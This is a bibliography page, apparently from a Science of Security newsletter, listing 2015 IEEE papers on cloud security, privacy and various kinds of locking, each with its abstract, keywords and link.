E. B. Fernandez, N. Yoshioka and H. Washizaki, "Patterns for Security and Privacy in Cloud Ecosystems," Evolving Security and Privacy Requirements Engineering (ESPRE), 2015 IEEE 2nd Workshop on, Ottawa, ON, 2015, pp. 13-18. doi: 10.1109/ESPRE.2015.7330162

Abstract: An ecosystem is the expansion of a software product line architecture to include systems outside the product which interact with the product. We model here the architecture of a cloud-based ecosystem, showing security patterns for its main components. We discuss the value of this type of models.

Keywords: cloud computing; data privacy; security of data; software architecture; cloud ecosystems privacy; cloud ecosystems security; cloud-based ecosystem; security patterns; software product line architecture; Cloud computing; Computer architecture; Ecosystems; Security; Software as a service; Unified modeling language; Virtualization; Software ecosystems; cloud computing; reference architectures; security patterns; systems security (ID#: 16-9465)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7330162&isnumber=7330155

 

Shaun Shei, L. Marquez Alcaniz, H. Mouratidis, A. Delaney, D. G. Rosado and E. Fernandez-Medina, "Modelling Secure Cloud Systems Based on System Requirements," Evolving Security and Privacy Requirements Engineering (ESPRE), 2015 IEEE 2nd Workshop on, Ottawa, ON, 2015, pp. 19-24. doi: 10.1109/ESPRE.2015.7330163

Abstract: We enhance an existing security governance framework for migrating legacy systems to the cloud by holistically modelling the cloud infrastructure. To achieve this we demonstrate how components of the cloud infrastructure can be identified from existing security requirements models. We further extend the modelling language to capture cloud security requirements through a dual layered view of the cloud infrastructure, where the notions are supported through a running example.

Keywords: cloud computing; security of data; software maintenance; specification languages; cloud infrastructure; cloud security requirements; legacy systems; modelling language; secure cloud system modeling; security governance framework; security requirements models; system requirements; Aging; Analytical models; Cloud computing; Computational modeling; Guidelines; Physical layer; Security (ID#: 16-9466)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7330163&isnumber=7330155

 

K. Katkalov, K. Stenzel, M. Borek and W. Reif, "Modeling Information Flow Properties with UML," New Technologies, Mobility and Security (NTMS), 2015 7th International Conference on, Paris, 2015, pp. 1-5. doi: 10.1109/NTMS.2015.7266507

Abstract: Providing guarantees regarding the privacy of sensitive information in a distributed system consisting of mobile apps and services is a challenging task. Our IFlow approach allows the model-driven development of such systems, as well as the automatic generation of code and a formal model. In this paper, we introduce modeling guidelines for the design of intuitive, flexible and expressive information flow properties with UML. Further, we show how these properties can be guaranteed using a combination of automatic language-based information flow control and model-based interactive verification.

Keywords: codes; formal verification; mobile computing; telecommunication control; telecommunication services; IFlow approach; UML; Unified Modeling Language; automatic language; distributed system; information flow control; information flow properties; mobile apps; model-based interactive verification; sensitive information; Analytical models; Androids; Java; Mobile communication; Security; Unified modeling language; information flow; model-driven software development; privacy (ID#: 16-9467)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7266507&isnumber=7266450

 

H. Ulusoy, M. Kantarcioglu, B. Thuraisingham and L. Khan, "Honeypot Based Unauthorized Data Access Detection in MapReduce Systems," Intelligence and Security Informatics (ISI), 2015 IEEE International Conference on, Baltimore, MD, 2015, pp. 126-131. doi: 10.1109/ISI.2015.7165951

Abstract: The data processing capabilities of MapReduce systems pioneered with the on-demand scalability of cloud computing have enabled the Big Data revolution. However, the data controllers/owners worried about the privacy and accountability impact of storing their data in the cloud infrastructures as the existing cloud computing solutions provide very limited control on the underlying systems. The intuitive approach - encrypting data before uploading to the cloud - is not applicable to MapReduce computation as the data analytics tasks are ad-hoc defined in the MapReduce environment using general programming languages (e.g, Java) and homomorphic encryption methods that can scale to big data do not exist. In this paper, we address the challenges of determining and detecting unauthorized access to data stored in MapReduce based cloud environments. To this end, we introduce alarm raising honeypots distributed over the data that are not accessed by the authorized MapReduce jobs, but only by the attackers and/or unauthorized users. Our analysis shows that unauthorized data accesses can be detected with reasonable performance in MapReduce based cloud environments.

Keywords: Big Data; cloud computing; cryptography; data analysis; data privacy; parallel processing; Big Data revolution; MapReduce systems; cloud computing; data analytics tasks; data encryption; data processing capabilities; general programming languages; homomorphic encryption methods; honeypot; on-demand scalability; privacy; unauthorized data access detection; Big data; Cloud computing; Computational modeling; Cryptography; Data models; Distributed databases (ID#: 16-9468)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7165951&isnumber=7165923

 

D. Gurov, P. Laud and R. Guanciale, "Privacy Preserving Business Process Matching," Privacy, Security and Trust (PST), 2015 13th Annual Conference on, Izmir, 2015, pp. 36-43. doi: 10.1109/PST.2015.7232952

Abstract: Business process matching is the activity of checking whether a given business process can interoperate with another one in a correct manner. In case the check fails, it is desirable to obtain information about how the first process can be corrected with as few modifications as possible to achieve interoperability. In case the two business processes belong to two separate enterprises that want to build a virtual enterprise, business process matching based on revealing the business processes poses a clear threat to privacy, as it may expose sensitive information about the inner operation of the enterprises. In this paper we propose a solution to this problem for business processes described by means of service automata. We propose a measure for similarity between service automata and use this measure to devise an algorithm that constructs the most similar automaton to the first one that can interoperate with the second one. To achieve privacy, we implement this algorithm in the programming language SecreC, executing on the Sharemind platform for secure multiparty computation. As a result, only the correction information is leaked to the first enterprise and no more.

Keywords: automata theory; business process re-engineering; data privacy; open systems; security of data; virtual enterprises; SecreC; Sharemind platform; business process matching; information privacy; interoperability; programming language; secure multiparty computation; service automata; virtual enterprise; Automata; Business; Collaboration; Guidelines; Privacy; System recovery; Weight measurement (ID#: 16-9469)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7232952&isnumber=7232940

 

J. Caramujo and A. M. Rodrigues Da Silva, "Analyzing Privacy Policies Based on a Privacy-Aware Profile: The Facebook and LinkedIn Case Studies," Business Informatics (CBI), 2015 IEEE 17th Conference on, Lisbon, 2015, pp. 77-84. doi: 10.1109/CBI.2015.44

Abstract: The regular use of social networking websites and applications encompasses the collection and retention of personal and very often sensitive information about users. This information needs to remain private and each social network owns a privacy policy that describes in-depth how users' information is managed and disclosed. Problems arise when the development of new systems and applications includes an integration with social networks. The lack of clear understanding and a precise mechanism to enforce the statements described in privacy policies can compromise the development and adaptation of these statements. This paper proposes the extension and validation of a UML profile for privacy-aware systems. The goal of this approach is to provide a better understanding of the different privacy-related requirements for improving privacy policies enforcement when developing systems or applications integrated with social networks. Additionally, to illustrate the potential of this profile, the paper presents and discusses its application with two real world case studies - the Facebook and Linked In policies - which are well structured and represented through two respective Excel files.

Keywords: Unified Modeling Language; computer network security; data privacy; information management; social networking (online);Excel file; Facebook; LinkedIn; UML profile; privacy aware profile; privacy aware system; privacy profile analysis; social networking Websites; user information management; Business; Conferences; Informatics; Facebook; LinkedIn; Privacy; Requirements; System; UML profile; integration (ID#: 16-9470)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7264718&isnumber=7264698

 


 

Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to news@scienceofsecurity.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.

Locking 2015

 

 
SoS Logo

Locking 2015

 

In computer science, a lock is a timing mechanism designed to enforce a control policy. Locks have some advantages and many disadvantages. To be efficient, they typically require hardware support. For the Science of Security community, locking is relevant to policy-based governance, resilience, cyber physical systems, and composability. This research was presented in 2015.


I. Singh, K. Mishra, A. M. Alberti, A. Jara and D. Singh, "A Novel Privacy and Security Framework for the Cloud Network Services," Advanced Communication Technology (ICACT), 2015 17th International Conference on, Seoul, 2015, pp. 363-367. doi: 10.1109/ICACT.2015.7224820

Abstract: This paper presents an overview of security and it's issues in cloud computing. Nowadays cloud computing has tremendous usage in so many fields such as financial management, communications and collaboration, office productivity suits, accounting applications, customer relationship management, online storage management, human resource and employment. Owing to increase in use of these services by companies, several security issues have emerged and this challenges cloud computing architectures to secure, protect and process user's data. These services have certain cons like security, lock-in, lack of control, and reliability. Privacy and security are the major concerns in cloud computing services. In this paper, we have designed a novel secure framework for cloud services, as well as presented a critical analysis of CCMP (Counter with Cipher Block Message Authentication Code Protocol) protocol for secure data management of cloud services.

Keywords: cloud computing; computer network security; cryptographic protocols; data privacy; CCMP protocol; cloud computing; cloud network services; counter with cipher block message authentication code protocol; privacy framework; secure data management; security framework; Cloud computing; Encryption; Payloads; Radiation detectors; Servers; CCMP; Cloud Computing; Security; Services (ID#: 16-9471)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7224820&isnumber=7224736

 

I. Singh, K. N. Mishra, A. Alberti, D. Singh and A. Jara, "A Novel Privacy and Security Framework for the Cloud Network Services," Innovative Mobile and Internet Services in Ubiquitous Computing (IMIS), 2015 9th International Conference on, Blumenau, 2015, pp. 301-305. doi: 10.1109/IMIS.2015.93

Abstract: This paper presents an overview of security and it's issues in cloud computing. Nowadays cloud computing has tremendous usage in so many fields such as financial management, communications and collaboration, office productivity suits, accounting applications, customer relationship management, online storage management, human resource and employment. Owing to increase in use of these services by companies, several security issues have emerged and this challenges cloud computing architectures to secure, protect and process user's data. These services have certain cons like security, lock-in, lack of control, and reliability. Privacy and security are the major concerns in cloud computing services. In this paper, we have designed a novel secure framework for cloud services, as well as presented a critical analysis of CCMP (Counter with Cipher Block Message Authentication Code Protocol) protocol for secure data management of cloud services.

Keywords: cloud computing; computer network reliability; computer network security; cryptographic protocols; data privacy; message authentication; software architecture; CCMP Protocol; accounting applications; cloud computing architectures; cloud network services; communications-and-collaboration; counter-with-cipher block message authentication code protocol; customer relationship management; employment; financial management; human resource; office productivity suits; online storage management; privacy framework; secure data management; security framework; user data processing; user data protection; Cloud computing; Encryption; Payloads; Radiation detectors; Servers; CCMP; Cloud Computing; Security; Services (ID#: 16-9472)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7284965&isnumber=7284886

 

Seongyeol Oh, Joon-Sung Yang, A. Bianchi and Hyoungshick Kim, "Devil in a Box: Installing Backdoors in Electronic Door Locks," Privacy, Security and Trust (PST), 2015 13th Annual Conference on, Izmir, 2015, pp. 139-144. doi: 10.1109/PST.2015.7232965

Abstract: Electronic door locks must be carefully designed to allow valid users to open (or close) a door and prevent unauthorized people from opening (or closing) the door. However, lock manufacturers have often ignored the fact that door locks can be modified by attackers in the real world. In this paper, we demonstrate that the most popular electronic door locks can easily be compromised by inserting a malicious hardware backdoor to perform unauthorized operations on the door locks. Attackers can replay a valid DC voltage pulse to open (or close) the door in an unauthorized manner or capture the user's personal identification number (PIN) used for the door lock.

Keywords: electronic engineering computing; electronic products; keys (locking); security of data; DC voltage pulse; PIN; backdoors installation; electronic door locks; lock manufacturers; malicious hardware backdoor; personal identification number; Batteries; Bluetooth; Central Processing Unit; Consumer electronics; Solenoids; Voltage measurement; Wires (ID#: 16-9473)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7232965&isnumber=7232940

 

N. W. Lo, C. K. Yu and C. Y. Hsu, "Intelligent Display Auto-Lock Scheme for Mobile Devices," Information Security (AsiaJCIS), 2015 10th Asia Joint Conference on, Kaohsiung, 2015, pp. 48-54. doi: 10.1109/AsiaJCIS.2015.30

Abstract: In recent years people in modern societies have heavily relied on their own intelligent mobile devices such as smartphones and tablets to get personal services and improve work efficiency. In consequence, quick and simple authentication mechanisms along with energy saving consideration are generally adopted by these smart handheld devices such as screen auto-lock schemes. When a smart device activates its screen lock mode to protect user privacy and data security on this device, its screen auto-lock scheme will be executed at the same time. Device user can setup the length of time period to control when to activate the screen lock mode of a smart device. However, it causes inconvenience for device users when a short time period is set for invoking screen auto-lock. How to get balance between security and convenience for individual users to use their own smart devices has become an interesting issue. In this paper, an intelligent display (screen) auto-lock scheme is proposed for mobile users. It can dynamically adjust the unlock time period setting of an auto-lock scheme based on derived knowledge from past user behaviors.

Keywords: authorisation; data protection; display devices; human factors; mobile computing; smart phones; authentication mechanisms; data security; energy saving; intelligent display auto-lock scheme; intelligent mobile devices; mobile users; personal services; screen auto-lock schemes; smart handheld devices; smart phones; tablets; unlock time period; user behaviors; user convenience; user privacy protection; user security; work efficiency improvement; Authentication; IEEE 802.11 Standards; Mathematical model; Smart phones; Time-frequency analysis; Android platform; display auto-lock; smartphone (ID#: 16-9474)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7153935&isnumber=7153836

 

S. Sengupta, K. M. Annervaz, A. Saxena and S. Paul, "Data Vaporizer - Towards a Configurable Enterprise Data Storage Framework in Public Cloud," Cloud Computing (CLOUD), 2015 IEEE 8th International Conference on, New York City, NY, 2015, pp. 73-80. doi: 10.1109/CLOUD.2015.20

Abstract: We propose a novel cloud-based data storage solution framework named Data Vaporizer (DV). The proposed framework provides many unique features such as storing data over multiple clouds or storage zones, resistance against organized vendor attacks, maintaining data integrity and confidentiality through client-side processing, fault-tolerance against failure of one or more cloud storage locations and avoids vendor lock-in of data. Data Vaporizer is highly configurable to meet various client data encryption requirements, compliance to industry standards and fault tolerance constraints depending on the nature and sensitivity of the data. To enhance the level of security and reliability, especially to protect data against malicious attacks and secure key management in cloud, DV uses advanced techniques of secret sharing of the keys. The architecture and optimality of data placement and efficient key management algorithm of DV ensure that the solution is highly scalable. The data foot print and subsequent cost incurred by our storage solution is minimal, considering the benefits provided. The initial response for the adoption of DV in actual client scenarios is promising.

Keywords: cloud computing; data integrity; security of data; storage management; client data encryption; cloud storage; confidentiality through client-side processing; configurable enterprise data storage framework; data integrity; data vaporizer; key management algorithm; keys secret sharing; public cloud; resistance against organized vendor attacks; storage zones; Cloud computing; Encoding; Encryption; Fault tolerance; Fault tolerant systems; Industries; cloud storage; data archival; enterprise data; fault-tolerance; integrity; optimal storage; privacy; secret key sharing; secure multi-party computation (ID#: 16-9475)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7214030&isnumber=7212169

 

S. R. Bandre, "Design and Implementation of Smartphone Authentication System Based on Color-Code," Pervasive Computing (ICPC), 2015 International Conference on, Pune, 2015, pp. 1-5. doi: 10.1109/PERVASIVE.2015.7087038

Abstract: Smartphones are used as a communication channel for exchanging user data and coordinating their business work. Users are more concerned about their private data that are stored on their portable devices, but unfortunately these devices are more prone to attacks by malicious users. The objective of this paper is to provide a new authentication system based on Color-Code such that it will preserve user's privacy and improve smartphone security. Every individual person has his own choice to select different colors. A color sequence can be a variety of unique color combinations and they are easy to remember. A user would specify desired Color-Code sequence as a passkey to authenticate user on the device. In order to fortify smartphone security from malicious users, this system uses random colors to increase difficulty of brute force attack. This system is based on multi-phase security schema which authenticates users and safeguards their privacy on a smartphone.

Keywords: data privacy; mobile computing; smart phones; authenticate user; authentication system; brute force attack; business work; color code sequence; color sequence; communication channel; exchanging user data; malicious user attack; malicious users; multiphase security schema; portable devices; private data; smartphone authentication system; smartphone security; Authentication; Bipartite graph; Color; Graphical user interfaces; Image color analysis; Privacy; Authentication; Color-code; Lock-screen; Mobile Device; Smartphone (ID#: 16-9476)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7087038&isnumber=7086957

 

A. Tashkandi and I. Al-Jabri, "Cloud Computing Adoption by Higher Education Institutions in Saudi Arabia: Analysis Based on TOE," Cloud Computing (ICCC), 2015 International Conference on, Riyadh, 2015, pp. 1-8.doi: 10.1109/CLOUDCOMP.2015.7149634

Abstract: (1) Background, Motivation and Objective: Academic study of Cloud Computing within Saudi Arabia is an emerging research field. Saudi Arabia represents the largest economy in the Arabian Gulf region. This positions it as a potential market of cloud computing technologies. Adoption of new innovations should be preceded by analysis of the added value, challenges and adequacy from technological, organizational and environmental perspectives. (2) Statement of Contribution/Method: This cross-sectional exploratory empirical research is based on Technology, Organization and Environment model targeting higher education institutions. In this study, the factors that influence the adoption by higher education institutions were analyzed and tested using Partial Least Square. (3) Results, Discussion and Conclusions: Three factors were found significant in this context. Relative Advantage, Data Privacy and Complexity are the most significant factors. The model explained 43% of the total adoption measure variation. Significant differences in the areas of cloud computing compatibility, complexity, vendor lock-in and peer pressure between large and small institutions were revealed. Items for future cloud computing research were explored through open-ended questions. Adoption of cloud services by higher education institutions has been started. It was found that the adoption rate among large universities is higher than small higher education institutions. Improving the network and Internet Infrastructure in Saudi Arabia at an affordable cost is a pre-requisite for cloud computing adoption. Cloud service provider should address the privacy and complexity concerns raised by non-adopters. Future information systems that are potential for hosting in cloud were prioritized.

Keywords: cloud computing; computer aided instruction; data privacy; educational institutions; further education; Arabian Gulf region; Internet infrastructure; Saudi Arabia; TOE model; cloud computing; data privacy; higher education institutions; partial least square; technology, organization and environment model; universities; Cloud computing; Complexity theory; Computational modeling; Context; Education; Organizations; Technological innovation (ID#: 16-9477)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7149634&isnumber=7149613 

 

C. Rathgeb, J. Wagner, B. Tams and C. Busch, "Preventing the Cross-Matching Attack in Bloom Filter-Based," Biometrics and Forensics (IWBF), 2015 International Workshop on, Gjovik, 2015, pp. 1-6. doi: 10.1109/IWBF.2015.7110226

Abstract: Deployments of biometric technologies are already widely disseminated, i.e. the protection of biometric reference data becomes vital in order to safeguard individuals' privacy. Biometric template protection techniques are designed to protect biometric templates in an irreversible and unlinkable manner (ISO/IEC IS 24745). In addition, these schemes are required to maintain key system properties, e.g. biometric performance or authentication speed. Recently, template protection schemes based on Bloom filters have been introduced and applied to various biometric characteristics, such as iris or face. While a Bloom filter-based representation of biometric templates is irreversible the originally proposed system has been exposed to be vulnerable to cross-matching attacks. In this paper we address this issue and demonstrate that any kind of Bloom filter-based representation of biometric templates can be transformed to an unordered set of integer values which enables a locking of irreversible templates in a fuzzy vault scheme from Dodis et al. which can be secured against known cross-matching attacks. In addition, experiments which are carried out on a publicly available iris database, show that the proposed scheme retains the biometric performance of the original system.

Keywords: data protection; data structures; fuzzy set theory; iris recognition; Bloom filter-based biometric template representation; Bloom filter-based cancelable biometrics; biometric reference data protection; biometric template protection techniques; cross-matching attack; fuzzy vault scheme; iris database; Feature extraction; Indexes;Iris recognition; Security; Bloom filter; Template protection; cross-matching; fuzzy vault; iris biometrics (ID#: 16-9478)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7110226&isnumber=7110217

 

M. Tanwar, R. Duggal and S. K. Khatri, "Unravelling Unstructured Data: A Wealth of Information in Big Data," Reliability, Infocom Technologies and Optimization (ICRITO) (Trends and Future Directions), 2015 4th International Conference on, Noida, 2015, pp. 1-6. doi: 10.1109/ICRITO.2015.7359270

Abstract: Big Data is data of high volume and high variety being produced or generated at high velocity which cannot be stored, managed, processed or analyzed using the existing traditional software tools, techniques and architectures. With big data many challenges such as scale, heterogeneity, speed and privacy are associated but there are opportunities as well. Potential information is locked in big data which if properly leveraged will make a huge difference to business. With the help of big data analytics, meaningful insights can be extracted from big data which is heterogeneous in nature comprising of structured, unstructured and semi-structured content. One prime challenge in big data analytics is that nearly 95% data is unstructured. This paper describes what big data and big data analytics is. A review of different techniques and approaches to analyze unstructured data is given. This paper emphasizes the importance of analysis of unstructured data along with structured data in business to extract holistic insights. The need for appropriate and efficient analytical methods for knowledge discovery from huge volumes of heterogeneous data in unstructured formats has been highlighted.

Keywords: Big Data; data mining; software architecture; software tools; text analysis; Big Data analytics; heterogeneous data; knowledge discovery; semistructured content; software architectures; software techniques; software tools; unstructured data analysis; Audio Analytics; Big Data; Social Media Analytics; Text Analytics; Unstructured data; Video Analytics (ID#: 16-9479)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7359270&isnumber=7359191

 

A. M. Khan, F. Freitag and L. Rodrigues, "Current Trends and Future Directions in Community Edge Clouds," Cloud Networking (CloudNet), 2015 IEEE 4th International Conference on, Niagara Falls, ON, 2015, pp. 239-241. doi: 10.1109/CloudNet.2015.7335315

Abstract: Cloud computing promises access to computing resources that is cost-effective, elastic and easily scalable. With few key cloud providers in the field, despite the benefits, there are issues like vendor lock-in, privacy and control over data. In this paper we focus on alternative models of cloud computing, like the community clouds at the edge which are built collaboratively using the resources contributed by the users, either through solely relying on users' machines, or using them to augment existing cloud infrastructures. We study community network clouds in the context of other initiatives in community cloud computing, mobile cloud computing, social cloud computing, and volunteer computing, and analyse how the context of community networks can support the community clouds.

Keywords: cloud computing; mobile computing; volunteer computing; cloud infrastructure; community edge cloud; community network cloud computing; mobile cloud computing; social cloud computing; user machine; volunteer computing; Cloud computing; Computational modeling; Computer architecture; Context; Mobile communication; Resource management; cloud computing; community clouds (ID#: 16-9480)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7335315&isnumber=7335267

 

A. Dabrowski, I. Echizen and E. R. Weippl, "Error-Correcting Codes as Source for Decoding Ambiguity," Security and Privacy Workshops (SPW), 2015 IEEE, San Jose, CA, 2015, pp. 99-105. doi: 10.1109/SPW.2015.28

Abstract: Data decoding, format, or language ambiguities have been long known for amusement purposes. Only recently it came to attention that they also pose a security risk. In this paper, we present decoder manipulations based on deliberately caused ambiguities facilitating the error correction mechanisms used in several popular applications. This can be used to encode data in multiple formats or even the same format with different content. Implementation details of the decoder or environmental differences decide which data the decoder locks onto. This leads to different users receiving different content based on a language decoding ambiguity. In general, ambiguity is not desired, however in special cases it can be particularly harmful. Format dissectors can make wrong decisions, e.g. A firewall scans based on one format but the user decodes different harmful content. We demonstrate this behavior with popular barcodes and argue that it can be used to deliver exploits based on the software installed, or use probabilistic effects to divert a small percentage of users to fraudulent sites.

Keywords: bar codes; decoding; encoding; error correction codes; fraud; security of data; barcodes; data decoding; data encoding; decoder manipulations; error correction mechanisms; error-correcting codes; format dissectors; fraudulent sites; language decoding ambiguity; security risk; Decoding; Error correction codes; Security; Software; Standards; Synchronization; Visualization; Barcode; Error Correcting Codes; LangSec; Language Security; Packet-in-Packet; Protocol decoding ambiguity; QR; Steganography (ID#: 16-9481)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7163213&isnumber=7163193

 

P. C. Prokopiou, P. E. Caines and A. Mahajan, "An Estimation Based Allocation Rule with Super-Linear Regret and Finite Lock-On Time for Time-Dependent Multi-Armed Bandit Processes," Electrical and Computer Engineering (CCECE), 2015 IEEE 28th Canadian Conference on, Halifax, NS, 2015, pp. 1299-1306. doi: 10.1109/CCECE.2015.7129466

Abstract: The multi-armed bandit (MAB) problem has been an active area of research since the early 1930s. The majority of the literature restricts attention to i.i.d. or Markov reward processes. In this paper, the finite-parameter MAB problem with time-dependent reward processes is investigated. An upper confidence bound (UCB) based index policy, where the index is computed based on the maximum-likelihood estimate of the unknown parameter, is proposed. This policy locks on to the optimal arm in finite expected time but has a super-linear regret. As an example, the proposed index policy is used for minimizing prediction error when each arm is a auto-regressive moving average (ARMA) process.

Keywords: Markov processes; autoregressive moving average processes; maximum likelihood estimation; resource allocation; ARMA process; Markov reward process; UCB based index policy; auto-regressive moving average process; estimation based allocation rule; finite expected time; finite lock-on time; finite-parameter MAB problem; maximum-likelihood estimation; prediction error minimization; superlinear regret; time-dependent multiarmed bandit process; time-dependent reward process; upper confidence bound based index policy; Computers; Indexes; Markov processes; Maximum likelihood estimation; Resource management; Technological innovation (ID#: 16-9482)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7129466&isnumber=7129089

 

P. Lindgren, M. Lindner, A. Lindner, D. Pereira and L. M. Pinho, "RTFM-Core: Language and Implementation," Industrial Electronics and Applications (ICIEA), 2015 IEEE 10th Conference on, Auckland, 2015, pp. 990-995. doi: 10.1109/ICIEA.2015.7334252

Abstract: Robustness, real-time properties and resource efficiency are key properties to embedded devices of the CPS/IoT era. In this paper we propose a language approach RTFM-core, and show its potential to facilitate the development process and provide highly efficient and statically verifiable implementations. Our programming model is reactive, based on the familiar notions of concurrent tasks and (single-unit) resources. The language is kept minimalistic, capturing the static task, communication and resource structure of the system. Whereas C-source can be arbitrarily embedded in the model, and/or externally referenced, the instep to mainstream development is minimal, and a smooth transition of legacy code is possible. A prototype compiler implementation for RTFM-core is presented. The compiler generates C-code output that compiled together with the RTFM-kernel primitives runs on bare metal. The RTFM-kernel guarantees deadlock-lock free execution and efficiently exploits the underlying interrupt hardware for static priority scheduling and resource management under the Stack Resource Policy. This allows a plethora of well-known methods to static verification (response time analysis, stack memory analysis, etc.) to be readily applied. The proposed language and supporting tool-chain is demonstrated by showing the complete process from RTFM-core source code into bare metal executables for a lightweight ARM-Cortex M3 target.

Keywords: C language; operating system kernels; program compilers; resource allocation; scheduling; ARM-Cortex M3 target; C-code output generation; C-source; RTFM-core language; RTFM-core source code; RTFM-kernel primitives; bare metal executables; deadlock-lock free execution; interrupt hardware; legacy code transition; prototype compiler implementation; reactive programming model; resource management; stack resource policy; static priority scheduling; static verification; Grammar; Hardware; Instruction sets; Job shop scheduling; Metals; Programming; Synchronization (ID#: 16-9483)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7334252&isnumber=7334072

 

P. Lindgren, M. Lindner, A. Lindner, D. Pereira and L. M. Pinho, "Well-formed Control Flow for Critical Sections in RTFM-core," Industrial Informatics (INDIN), 2015 IEEE 13th International Conference on, Cambridge, 2015, pp. 1438-1445. doi: 10.1109/INDIN.2015.7281944

Abstract: The mainstream of embedded software development as of today is dominated by C programming. To aid the development, hardware abstractions, libraries, kernels and lightweight operating systems are commonplace. Such kernels and operating systems typically impose a thread based abstraction to concurrency. However, in general thread based programming is hard, plagued by race conditions and dead-locks. For this paper we take an alternative outset in terms of a language abstraction, RTFM-core, where the system is modelled directly in terms of tasks and resources. In compliance to the Stack Resource Policy (SRP) model, the language enforces (well-formed) LIFO nesting of claimed resources, thus SRP based analysis and scheduling can be readily applied. For the execution onto bare-metal single core architectures, the rtfm-core compiler performs SRP analysis on the model and render an executable that is deadlock free and (through RTFM-kernel primitives) exploits the underlying interrupt hardware for efficient scheduling. The RTFM-core language embeds C-code and links to C-object files and libraries, and is thus applicable to the mainstream of embedded development. However, while the language enforces well-formed resource management, control flow in the embedded C-code may violate the LIFO nesting requirement. In this paper we address this issue by lifting a subset of C into the RTFM-core language allowing arbitrary control flow at the model level. In this way well-formed LIFO nesting can be enforced, and models ensured to be correct by construction. We demonstrate the feasibility by means of a prototype implementation in the rtfm-core compiler. Additionally, we develop a set of running examples and show in detail how control flow is handled at compile time and during run-time execution.

Keywords: C language; embedded systems; program compilers; program control structures; scheduling; C programming; C-object files; C-object libraries; LIFO nesting requirement; RTFM-core compiler; SRP model; bare-metal single core architectures; control flow; embedded C-code; embedded software development; general thread based programming; language abstraction; last-in-first-out nesting requirement; lightweight operating systems; resource management; stack resource policy model; thread based abstraction; Concurrent computing; Hardware; Kernel; Libraries; Programming; Switches; Synchronization (ID#: 16-9484)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7281944&isnumber=7281697

 

Bowu Zhang, Jinho Hwang, L. Ma and T. Wood, "Towards Security-Aware Virtual Server Migration Optimization to the Cloud," Autonomic Computing (ICAC), 2015 IEEE International Conference on, Grenoble, 2015, pp. 71-80. doi: 10.1109/ICAC.2015.45

Abstract: Cloud computing, featured by shared servers and location independent services, has been widely adopted by various businesses to increase computing efficiency, and reduce operational costs. Despite significant benefits and interests, enterprises have a hard time to decide whether or not to migrate thousands of servers into the cloud because of various reasons such as lack of holistic migration (planning) tools, concerns on data security and cloud vendor lock-in. In particular, cloud security has become the major concern for decision makers, due to the nature weakness of virtualization -- the fact that the cloud allows multiple users to share resources through Internet-facing interfaces can be easily taken advantage of by hackers. Therefore, setting up a secure environment for resource migration becomes the top priority for both enterprises and cloud providers. To achieve the goal of security, security policies such as firewalls and access control have been widely adopted, leading to significant cost as additional resources need to employed. In this paper, we address the challenge of the security-aware virtual server migration, and propose a migration strategy that minimizes the migration cost while promising the security needs of enterprises. We prove that the proposed security-aware cost minimization problem is NP hard and our solution can achieve an approximate factor of 2. We perform an extensive simulation study to evaluate the performance of the proposed solution under various settings. Our simulation results demonstrate that our approach can save 53%moving cost for a single enterprise case, and 66% for multiple enterprises case comparing to a random migration strategy.

Keywords: cloud computing; cost reduction; resource allocation; security of data; virtualisation; Internet-facing interfaces; NP hard problem; cloud computing; cloud security; cloud vendor lock-in; data security; moving cost savings; resource migration; resource sharing; security policy; security-aware cost minimization problem; security-aware virtual server migration optimization; virtualization; Approximation algorithms; Approximation methods; Cloud computing; Clustering algorithms; Home appliances; Security; Servers; Cloud Computing; Cloud Migration; Cloud Security; Cost Minimization (ID#: 16-9485)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7266936&isnumber=7266915

 

A. Atalar, A. Gidenstam, P. Renaud-Goud and P. Tsigas, "Modeling Energy Consumption of Lock-Free Queue Implementations," Parallel and Distributed Processing Symposium (IPDPS), 2015 IEEE International, Hyderabad, 2015, pp. 229-238. doi: 10.1109/IPDPS.2015.31

Abstract: This paper considers the problem of modelling the energy behaviour of lock-free concurrent queue data structures. Our main contribution is a way to model the energy behaviour of lock-free queue implementations and parallel applications that use them. Focusing on steady state behaviour we decompose energy behaviour into throughput and power dissipation which can be modeled separately and later recombined into several useful metrics, such as energy per operation. Based on our models, instantiated from synthetic benchmark data, and using only a small amount of additional application specific information, energy and throughput predictions can be made for parallel applications that use the respective data structure implementation. To model throughput we propose a generic model for lock-free queue throughput behaviour, based on combination of the dequeuers' throughput and enqueuers' throughput. To model power dissipation we commonly split the contributions from the various computer components into static, activation and dynamic parts, where only the dynamic part depends on the actual instructions being executed. To instantiate the models a synthetic benchmark explores each queue implementation over the dimensions of processor frequency and number of threads. Finally, we show how to make predictions of application throughput and power dissipation for a parallel application using lock-free queue requiring only a limited amount of information about the application work done between queue operations. Our case study on a Mandelbrot application shows convincing prediction results.

